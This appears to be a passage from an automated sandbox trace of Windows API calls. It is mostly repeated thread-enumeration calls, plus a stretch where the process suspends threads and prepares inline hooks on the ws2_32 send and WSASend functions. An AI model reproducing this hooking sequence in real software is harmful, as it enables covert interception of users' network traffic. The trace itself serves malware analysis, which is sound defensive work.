[0175.070] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.070] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.070] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.071] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.071] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.071] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.071] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.073] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.073] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.073] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.073] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.074] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.074] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.074] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.075] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.075] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.075] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.075] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.076] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.076] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.076] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.076] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.077] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.077] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.077] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.078] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.078] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.078] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.078] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.079] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.079] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.079] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.079] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.080] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.080] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.080] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.081] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.081] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.081] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.081] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.082] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.082] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.082] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.082] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.083] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.083] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.083] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.084] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.084] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.084] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.084] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.085] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.085] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.085] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.085] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.086] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.086] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.086] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.086] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.087] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.087] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.235] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.236] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.236] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.236] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.236] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.237] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.237] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.237] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.237] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.238] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.238] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.238] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.239] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.239] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.239] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.239] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.240] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.240] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.240] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.240] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.241] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.241] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.241] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.242] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.242] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.242] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.242] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.243] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.243] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.243] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.244] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.244] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.244] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.245] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.245] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.245] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.245] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.246] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.246] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.246] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.246] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.247] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.247] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.247] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.248] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.248] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.248] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.248] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.249] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.249] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.249] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.249] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.250] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.250] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.250] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.251] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.251] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.251] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.251] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.252] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.252] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.252] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.253] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.253] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.253] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.253] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.254] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.254] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.254] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.254] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.255] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.255] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.255] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.256] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.256] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.256] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.256] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.257] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.257] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.257] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.257] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.258] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.258] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.258] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.259] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.259] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.259] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.259] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.260] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.260] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.260] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.260] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.261] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.261] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.261] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.262] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.330] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x184) returned 0x8c [0175.330] SuspendThread (hThread=0x8c) returned 0x0 [0175.330] CloseHandle (hObject=0x8c) returned 1 [0175.331] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x994) returned 0x8c [0175.331] SuspendThread (hThread=0x8c) returned 0x0 [0175.331] CloseHandle (hObject=0x8c) returned 1 [0175.353] CloseHandle (hObject=0x88) returned 1 [0175.353] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0175.353] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0175.353] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0175.353] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xf0000 [0175.353] RtlMoveMemory (in: Destination=0xf0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xf0000) [0175.354] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0175.360] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0175.360] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0175.360] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0175.360] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0175.360] RtlMoveMemory (in: Destination=0x100000, Source=0x75bc4406, Length=0x5 | out: Destination=0x100000) [0175.361] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0175.365] GetCurrentProcessId () returned 0x7d8 [0175.365] GetCurrentThreadId () returned 0x5f0 [0175.365] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0175.368] Thread32First (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.430] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.431] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.431] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.431] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.432] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.432] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.432] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.432] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.433] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.433] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.433] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.434] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.434] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.434] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.434] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.435] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.435] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.435] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.435] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.436] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.436] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.436] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.437] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.437] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.437] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.437] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.438] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.438] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.438] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.438] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.439] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.439] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.439] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.440] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.440] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.440] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.440] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.441] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.441] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.441] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.441] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.442] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.442] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.442] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.443] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.443] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.443] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.443] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.444] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.444] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.444] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.444] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.445] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.445] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.445] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.445] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.446] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.446] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.446] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.447] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.447] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.447] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.448] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.448] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.448] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.448] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.449] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.449] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.449] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.449] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.450] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.450] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.450] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.451] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.451] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.451] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.451] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.452] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.452] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.452] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.452] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.453] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.453] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.453] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.454] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.454] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.454] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.454] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.455] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.455] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.455] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.455] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.456] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.456] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.456] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.457] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.457] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.457] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.457] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.458] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.458] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.458] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.458] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.459] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.459] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.459] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.460] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.460] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.460] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.460] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.461] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.461] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.461] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.462] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.462] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.462] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.463] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.463] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.463] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.463] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.464] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.464] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.464] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.464] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.465] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.465] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.465] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.466] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.466] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.466] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.466] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.467] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.467] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.467] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.467] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.468] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.468] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.468] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.469] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.469] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.469] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.469] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.470] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.470] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.470] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.470] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.471] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.471] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.471] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.472] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.472] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.472] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.472] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.473] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.473] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.473] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.474] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.474] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.474] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.474] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.475] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.475] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.475] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.475] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.476] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.476] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.476] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.476] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.477] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.477] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.525] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.525] Thread32Next (hSnapshot=0x88, 